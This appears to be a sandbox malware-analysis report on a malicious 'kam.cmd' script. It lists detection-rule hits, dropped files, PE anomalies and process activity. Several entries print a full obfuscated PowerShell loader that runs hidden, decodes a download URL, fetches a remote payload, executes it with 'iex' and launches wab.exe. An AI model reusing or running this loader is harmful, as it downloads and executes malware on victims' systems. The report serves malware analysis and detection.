Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6375
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F1B8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F1AB16
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7E928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7F1F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7E5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07A59398
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
Source: AppVDllSurrogate.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: officeappguardwin32.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate64.exe.9.dr | Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OfficeScrSanBroker.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.9.dr | Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: AppVLP.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: VC_redist.x64.exe.9.dr | Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: UcMapi.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: ai.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: integrator.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.9.dr | Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.9.dr | Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: upx.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe0.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: SciTE.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.9.dr | Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OLicenseHeartbeat.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: grv_icons.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.9.dr | Static PE information: Resource name: RT_ICON type: DitPack archive data
Source: javaws.exe.9.dr | Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: GoogleCrashHandler.exe.9.dr | Static PE information: Resource name: RT_ICON type: DOS executable (block device driver)
Source: GoogleCrashHandler64.exe.9.dr | Static PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
Source: OcPubMgr.exe.9.dr | Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.9.dr | Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VSTOInstaller.exe.9.dr | Static PE information: Data appended to the last section found
Source: chrome.exe.9.dr | Static PE information: Data appended to the last section found
Source: grv_icons.exe.9.dr | Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.9.dr | Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.9.dr | Static PE information: Data appended to the last section found
Source: PerfBoost.exe.9.dr | Static PE information: Data appended to the last section found
Source: aimgr.exe0.9.dr | Static PE information: Data appended to the last section found
Source: SQLDumper.exe.9.dr | Static PE information: Data appended to the last section found
Source: Au3Check.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.9.dr | Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.9.dr | Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.9.dr | Static PE information: Data appended to the last section found
Source: Uninstall.exe.9.dr | Static PE information: Data appended to the last section found
Source: armsvc.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.9.dr | Static PE information: Data appended to the last section found
Source: javaws.exe.9.dr | Static PE information: Data appended to the last section found
Source: msoev.exe.9.dr | Static PE information: Data appended to the last section found
Source: javaw.exe.9.dr | Static PE information: Data appended to the last section found
Source: MsMpEng.exe.9.dr | Static PE information: Data appended to the last section found
Source: aimgr.exe.9.dr | Static PE information: Data appended to the last section found
Source: java.exe.9.dr | Static PE information: Data appended to the last section found
Source: Au3Info.exe.9.dr | Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.9.dr | Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.9.dr | Static PE information: Data appended to the last section found
Source: Wordconv.exe.9.dr | Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.9.dr | Static PE information: Data appended to the last section found
Source: Common.DBConnection.exe.9.dr | Static PE information: Data appended to the last section found
Source: SDXHelper.exe.9.dr | Static PE information: Data appended to the last section found
Source: upx.exe.9.dr | Static PE information: Data appended to the last section found
Source: GoogleCrashHandler.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.9.dr | Static PE information: Data appended to the last section found
Source: GoogleCrashHandler64.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppVLP.exe.9.dr | Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.9.dr | Static PE information: Data appended to the last section found
Source: dbcicons.exe.9.dr | Static PE information: Data appended to the last section found
Source: amsi32_5572.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: VC_redist.x64.exe.9.dr | Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: OfficeScrSanBroker.exe.9.dr | Binary string: \Device\Afd\WepollNtCreateFilentdll.dllNtReleaseKeyedEventRtlNtStatusToDosErrorNtDeviceIoControlFileNtWaitForKeyedEventNtCreateKeyedEventwsipcudptcppipe_ != NULLopensource\libzmq\src\channel.cpp%s (%s:%d)
Source: classification engine | Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Klavers.Uen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bhgphdw.1ud.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1716
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. 
karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. 
karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ 